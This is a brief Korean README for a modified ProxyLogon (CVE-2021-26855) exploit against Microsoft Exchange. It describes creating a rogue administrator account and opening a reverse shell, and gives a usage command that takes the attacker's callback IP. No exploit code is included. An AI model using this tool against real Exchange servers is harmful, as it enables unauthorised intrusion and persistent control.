
CVE-2021-26855 (ProxyLogon) 취약점을 이용한 Microsoft Exchange 대상 익스플로잇입니다. 새로운 관리자 사용자를 생성하고 사후 침투 접근을 위한 리버스 셸을 설정합니다.
CVE-2021-26855
이것은 proxylogon의 POC 수정 버전입니다. "whoami"를 실행하는 대신 새 사용자를 만들고 해당 사용자를 관리자 그룹에 추가한 후 리버스 셸을 생성합니다. 원본 POC 코드는 여기에서 찾을 수 있습니다: https://www.exploit-db.com/exploits/49663
사용법: python proxylogon.py <reverse_shell_ip>